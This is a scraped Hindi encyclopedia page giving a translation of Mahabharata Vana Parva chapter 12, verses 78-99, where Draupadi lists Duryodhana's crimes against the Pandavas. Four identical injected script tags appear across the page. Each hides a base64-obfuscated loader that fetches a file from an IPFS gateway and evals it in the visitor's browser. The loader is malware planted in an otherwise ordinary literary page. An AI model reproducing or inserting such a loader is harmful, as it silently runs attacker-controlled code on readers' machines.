महाभारत वन पर्व अध्याय 12 श्लोक 78-99

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

द्वादश (12) अध्‍याय: वन पर्व (अरण्‍यपर्व)

महाभारत: वन पर्व: द्वादश अध्याय: श्लोक 78-99 का हिन्दी अनुवाद

कृष्ण ! भीमसेन के बल को धिक्कार है, अर्जुन के पुरुषार्थ को भी धिक्कार है, जिसके होते हुए दुर्योधन इतना बड़ा अत्याचार करके दो घड़ी भी जीवित रह रहा है। मधुसूदन ! पहले बाल्यावस्था में, जब कि पाण्डव ब्रह्मचर्य-व्रत का पालन करते हुए अध्ययन में लगे थे, किसी की हिंसा नहीं करते थे, जिस दुष्ट ने इन्हें इनकी माता के साथ राज्य से बाहर निकाल दिया था। जिस पापी ने भीमसेन के भोजन में नूतन, तीक्ष्ण परिमाण में अधिक एवं रोमांचकारी कालकूट नामक विष डलवा दिया था। महाबाहु नरश्रेष्ठ जनार्दन ! भीमसेन की आयु शेष थी, इसीलिये वह घातक विष अन्न के साथ ही पच गया और उसने कोई विकार नहीं उत्पन्न किया( इस प्रकार उस दुर्योधन के अत्याचारों को कहाँ तक गिनाया जाये )।

श्रीकृष्ण ! प्रमाणकोटि तीर्थ में, जब भीमसेन विश्वस्त होकर सो रहे थे, उस समय दुर्योधन ने इन्हें बाँधकर गंगा में फेंक दिया और स्वयं चुपचाप राजधानी में लौट आया। जब इनकी आँख खुली तो ये महाबली महाबाहु भीमसेन सारे बन्धनों को तोड़ कर जल से ऊपर उठे। इनके सारे अंगों में विषैले काले सर्पो से डसवाया; परंतु शत्रुहन्ता भीमसेन मर न सके। जागने पर कुन्तीनन्दन भीम ने सब सर्पों को उठा-उठा-कर पटक दिया। दुर्योधन ने भीमसेन के प्रिय सारथि को भी उलटे हाथ से मार डाला। इतना ही नहीं, वारणावत में आर्या कुन्ती के साथ में ये बालक पाण्डव सो रहे थे, उस समय उसने घर में आग लगवा दी, ऐसा दुष्कर्म दूसरा कौन कर सकता है? उस समय वहाँ आर्या कुन्ती भयभीत हो रोती हुई पाण्डवों से इस प्रकार बोलीं- ‘मैं बड़े भारी संकट में पड़ी, आग से घिर गयी।' ‘हाय ! हाय !' मैं मारी गयी, अब इस आग से कैसे शान्ति प्राप्त होगी? मैं अनाथ की तरह अपने पुत्रों के साथ नष्ट हो जाऊँगी।' उस समय वहाँ वायु के समान वेग और पराक्रम वाले महाबाहु भीमसेन ने आर्या कुन्ती तथा भाइयों को आश्वासन देते हुए कहा--‘पक्षियों में श्रेष्ठ विनतानन्दन गरुड़ जैसे उड़ा करते हैं, उसी प्रकार मैं भी तुम सब को लेकर यहाँ से चल दूँगा। अतः तुम्हें यहाँ तनिक भी भय नहीं है ।'

ऐसा कहकर पराक्रमी एव बलवान भीम ने आर्या कुन्ती को बायें अंग में, धर्मराज को दाहिने अंग में, नकुल और सहदेव को दोनों कंधों पर तथा अर्जुन को पीठ पर चढ़ा लिया और सबको लिये-लिये सहसा वेग से उछलकर इन्होंने उस भयंकर अग्नि से भाइयों तथा माता की रक्षा की[१]। फिर वे यशस्वी पाण्डव माता के साथ रात में ही वहाँ से चल दिये और हिडिम्ब -वन के पास एक भारी वन में जा पहुँचे। वहाँ माता सहित ये दुखी पाण्डव थककर सो गये। सो जाने पर इनके निकट हिडिम्बा नामक राक्षसी आयी। माता सहित पाण्डवों को वहाँ धरती पर सोते देख काम से पीड़ित हो उस राक्षसी ने भीमसेन की कामना की। भीम के पैरों को अपनी गोदी में लेकर वह कल्याणमयी अबला अपने कोमल हाथों से प्रसन्नतापूर्वक दबाने लगी। उसका स्पर्श पाकर बलवान सत्य पराक्रमी तथा अमेयात्मा भीमसेन जाग उठे। जागने पर उन्होंने पूछा--‘सुन्दरी ! यहाँ तुम क्या चाहती हो?।' इस प्रकार पूछने पर इच्छानुसार रूप धारण करने वाली उस अनिन्ध सुन्दरी राक्षसकन्या ने महात्मा भीम से कहा- ‘ आप लोग यहाँ से जल्दी भाग जायें, मेरा यह बलवान भाई हिडिम्ब आपको मारने के लिये आयेगा; अतः आप जल्दी चले जाइये,देर न कीजिये‘।



« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. आदि पर्व के 147वें अध्याय के लाक्षा गृहदाह प्रसंग में बतलाया है कि ‘भीमसेन ने माता को तो कंधे पर चढ़ा लिया और नकुल, सहदेव को गोद में उठा लिया तथा शेष दोनों भाइयों को दोनों हाथों से पकड़कर उन्हें सहारा देते हुए चलने लगे।‘ इस कथन से द्रौपदी के वचन भिन्न हैं; क्योंकि द्रौपदी का उस समय विवाह नहीं हुआ था, अतः द्रौपदी इस बात को ठीक-ठीक नहीं जानती थी, इसी से वह लोगों के मुख से सुनी-सुनायी बात अनुमान से कह रही है; अतः लाक्षा गृहदाह के प्रसंग की बात ही ठीक है।

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>